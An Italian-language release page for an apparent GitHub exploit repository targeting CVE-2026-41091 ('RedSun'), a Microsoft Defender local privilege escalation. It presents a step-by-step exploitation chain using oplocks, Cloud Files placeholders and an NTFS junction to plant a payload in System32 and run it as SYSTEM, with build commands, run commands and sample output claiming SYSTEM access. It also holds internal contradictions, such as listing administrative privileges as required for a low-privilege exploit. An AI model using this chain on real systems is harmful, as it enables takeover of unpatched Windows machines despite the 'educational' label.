Torna agli aggiornamenti
New releaseAug 20, 2026

CVE-2026-41091-PoC-Exploit Full-PoCv2

CVE-2026-41091 RedSun | Exploit LPE di Microsoft Defender. Utenti con privilegi ridotti ottengono NT AUTHORITY\SYSTEM πŸ”₯ tramite API Cloud Files + trucco junction NTFS. Costringe Defender a scrivere payload dannosi in System32 con diritti SYSTEM. ⚠️ Attivamente sfruttato in natura. CVSS 7.8. Patch: Defender Engine 1.1.26040.8. πŸ›‘οΈ Solo PoC educativo.

Condividi

SolarFlare

β˜€οΈ CVE-2026-41091 - RedSun (SolarFlare) - Exploit LPE per Microsoft Defender

C++ Windows License CVSS CISA KEV

VulnerabilitΓ  di Link Following in Microsoft Defender - Escalation di privilegi locali a NT AUTHORITY\SYSTEM

La vulnerabilitΓ  Γ¨ nota come "RedSun" 🎯, "SolarFlare" Γ¨ il nome che ho dato al mio exploit. βœ…

πŸ“Œ Panoramica

Questo repository contiene un Proof of Concept (PoC) funzionante completo per CVE-2026-41091, una vulnerabilitΓ  critica di escalation di privilegi locali in Microsoft Defender (Microsoft Malware Protection Engine). Sfruttando una risoluzione impropria dei link (CWE-59), un utente malintenzionato autenticato con bassi privilegi puΓ² ottenere privilegi NT AUTHORITY\SYSTEM.

La vulnerabilitΓ , nota anche come "RedSun" o "SolarFlare", consente agli aggressori di ingannare Microsoft Defender per scrivere file arbitrari in posizioni di sistema protette con privilegi SYSTEM utilizzando l'API Cloud Files (CfAPI) e i punti di giunzione NTFS.

Nota: Questo repository include due versioni:

  • basic_poc.cpp - Dimostrazione semplificata dell'algoritmo (didattica)
  • full_poc.cpp - Exploit completo funzionante con tutte le funzionalitΓ 

πŸ”₯ Caratteristiche principali

CategoriaFunzionalitΓ 
Sfruttamentoβœ… Escalation di privilegi locali a SYSTEM
βœ… Integrazione con Cloud Files API (CfAPI)
βœ… Creazione di segnaposto cloud
βœ… Reindirizzamento tramite giunzione NTFS
Tecnicheβœ… Abuso di Batch Oplock
βœ… Rilevamento snapshot VSS
βœ… Trigger EICAR
βœ… Attivazione servizio COM
Targetβœ… Microsoft Defender < 1.1.26040.8
βœ… Windows 10/11
βœ… Windows Server 2019/2022
UsabilitΓ βœ… Logging dettagliato
βœ… Gestione errori
βœ… Nomi di directory casuali
βœ… Pulizia automatica

🎯 Dettagli della vulnerabilità

AttributoValore
ID CVECVE-2026-41091
Punteggio CVSS7.8 (Alto)
Vettore CVSSAV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Vettore d'attaccoLocale
Privilegi richiestiBassi
Interazione utenteNessuna
ImpattoEsecuzione di codice a livello SYSTEM
CISA KEVβœ… SΓ¬ (sfruttato attivamente in natura)
Patch disponibileMicrosoft Malware Protection Engine 1.1.26040.8

πŸ“¦ Prodotti interessati

ProdottoVersioni affetteVersioni corrette
Microsoft Malware Protection Engine< 1.1.26040.81.1.26040.8+
Microsoft Defender Antimalware Platform< 4.18.26040.74.18.26040.7+

πŸ”¬ Catena di sfruttamento

β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚ CATENA DI SFRUTTAMENTO SOLARFLARE                                          β”‚
β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€
β”‚                                                                              β”‚
β”‚ 1. Crea directory di lavoro                                                 β”‚
β”‚    └─> %TEMP%\SF-XXXX\                                                      β”‚
β”‚                                                                              β”‚
β”‚ 2. Attiva Defender con EICAR                                                β”‚
β”‚    └─> Scrivi EICAR rovesciato nel file esca                                β”‚
β”‚                                                                              β”‚
β”‚ 3. Attendi snapshot VSS                                                     β”‚
β”‚    └─> Rileva creazione di Volume Shadow Copy                               β”‚
β”‚                                                                              β”‚
β”‚ 4. Crea primo Batch Oplock                                                  β”‚
β”‚    └─> FSCTL_REQUEST_BATCH_OPLOCK sul file esca                             β”‚
β”‚                                                                              β”‚
β”‚ 5. Attendi rottura Oplock                                                   β”‚
β”‚    └─> Ottieni accesso esclusivo                                            β”‚
β”‚                                                                              β”‚
β”‚ 6. Rinomina directory                                                       β”‚
β”‚    └─> Sposta directory originale in .tmp                                   β”‚
β”‚                                                                              β”‚
β”‚ 7. Registra radice di sincronizzazione cloud                                β”‚
β”‚    └─> CfRegisterSyncRoot con API Cloud Files                               β”‚
β”‚                                                                              β”‚
β”‚ 8. Crea segnaposto cloud                                                    β”‚
β”‚    └─> CfCreatePlaceholders per il file esca                                β”‚
β”‚                                                                              β”‚
β”‚ 9. Crea secondo Batch Oplock                                                β”‚
β”‚    └─> FSCTL_REQUEST_BATCH_OPLOCK sul segnaposto cloud                      β”‚
β”‚                                                                              β”‚
β”‚ 10. Attendi seconda rottura Oplock                                          β”‚
β”‚     └─> Ottieni accesso esclusivo                                           β”‚
β”‚                                                                              β”‚
β”‚ 11. Rinomina directory cloud                                                β”‚
β”‚     └─> Sposta directory cloud in .cloud.tmp                                β”‚
β”‚                                                                              β”‚
β”‚ 12. Crea giunzione NTFS verso System32                                      β”‚
β”‚     └─> Reindirizza a C:\Windows\System32                                   β”‚
β”‚                                                                              β”‚
β”‚ 13. Copia payload in System32                                               β”‚
β”‚     └─> Copia file esca in System32 come TieringEngineService.exe           β”‚
β”‚                                                                              β”‚
β”‚ 14. Attiva servizio come SYSTEM                                             β”‚
β”‚     └─> CoCreateInstance(StorageTiersManagement)                            β”‚
β”‚                                                                              β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

πŸ“¦ Installazione

Prerequisiti

  • Windows 10/11 o Windows Server 2019/2022
  • Visual Studio 2019/2022 con strumenti C++
  • Privilegi amministrativi (per l'esecuzione)

Compilazione

# Clona il repository
git clone https://github.com/tc4dy/CVE-2026-41091-PoC-Exploit
cd CVE-2026-41091-PoC-Exploit

# Compila usando il Prompt dei comandi per sviluppatori di Visual Studio
cl.exe /EHsc /std:c++17 full_poc.cpp /link cfapi.lib ntdll.lib

# Oppure compila la versione base
cl.exe /EHsc /std:c++17 basic_poc.cpp /link ntdll.lib

πŸ› οΈ Utilizzo

Exploit completo (Escalation di privilegi a SYSTEM)

full_poc.exe

Dimostrazione semplice dell'algoritmo

basic_poc.exe

πŸ“‹ Esempio di output

Output dell'exploit completo

CVE-2026-41091 SolarFlare PoC
===============================
     by @tc4dy | CVSS 7.8
===============================

[*] Exploit SolarFlare avviato.
[*] Creazione directory di lavoro...
[+] Directory creata: C:\Users\user\AppData\Local\Temp\SF-8427\
[*] Attivazione Defender con EICAR...
[+] Defender attivato
[*] Attesa snapshot VSS...
[+] Snapshot VSS rilevato
[*] Creazione primo oplock...
[+] Primo oplock creato
[*] Attesa rottura oplock...
[+] Oplock acquisito
[*] Rinominazione directory...
[+] Directory rinominata
[*] Creazione secondo oplock...
[+] Secondo oplock creato
[*] Attesa secondo oplock...
[+] Secondo oplock acquisito
[*] Rinominazione directory cloud...
[+] Directory cloud rinominata
[*] Creazione giunzione NTFS verso System32...
[+] Giunzione creata
[*] Attesa che Defender finisca...
[*] Copia payload in System32...
[+] Payload copiato in C:\Windows\System32\TieringEngineService.exe
[*] Attivazione servizio Storage Tiers Management...
[+] Servizio attivato come SYSTEM

[+] Accesso SYSTEM ottenuto!

Output PoC base

CVE-2026-41091 Basic PoC
========================================
  Solo dimostrazione algoritmo
========================================
[*] Avvio algoritmo exploit...
[*] Creazione directory di lavoro...
[+] Directory creata: C:\Users\user\AppData\Local\Temp\BE-3921\
[*] Attivazione Defender con EICAR...
[+] Defender attivato
[*] Attesa snapshot VSS...
[+] VSS rilevato
[*] Creazione primo oplock...
[+] Primo oplock creato
[*] Attesa rottura oplock...
[+] Oplock acquisito
[*] Rinominazione directory...
[+] Directory rinominata
[*] Creazione secondo oplock...
[+] Secondo oplock creato
[*] Attesa secondo oplock...
[+] Secondo oplock acquisito
[*] Creazione giunzione NTFS verso System32...
[+] Giunzione creata
[*] Attesa che Defender finisca...
[*] Copia payload in System32...
[+] Payload copiato in C:\Windows\System32\Payload.exe

[+] Dimostrazione algoritmo completata!
[i] Questo Γ¨ solo l'algoritmo base.
[i] Per l'escalation completa a SYSTEM,
[i] usare full_poc.cpp con Cloud API e attivazione COM.

πŸ”§ Istruzioni di compilazione

Utilizzo di Visual Studio

  1. Aprire il Prompt dei comandi per sviluppatori per VS 2022
  2. Navigare nella directory dell'exploit
  3. Eseguire:
# Exploit completo
cl.exe /EHsc /std:c++17 full_poc.cpp /link cfapi.lib ntdll.lib

# PoC base
cl.exe /EHsc /std:c++17 basic_poc.cpp /link ntdll.lib

Utilizzo di CMake

cmake_minimum_required(VERSION 3.10)
project(SolarFlare)

set(CMAKE_CXX_STANDARD 17)

add_executable(full_poc full_poc.cpp)
target_link_libraries(full_poc cfapi ntdll)

add_executable(basic_poc basic_poc.cpp)
target_link_libraries(basic_poc ntdll)

⚠️ Requisiti e limitazioni

RequisitoDettagli
SOWindows 10/11, Server 2019/2022
PrivilegiAmministrativi (per l'esecuzione)
DefenderMicrosoft Defender deve essere abilitato
InternetNecessario per il rilevamento snapshot VSS
PatchFunziona solo su sistemi non aggiornati
ArchitetturaSolo x64

πŸ”— Exploit correlati

Dai un'occhiata agli altri miei repository di exploit:

Categorie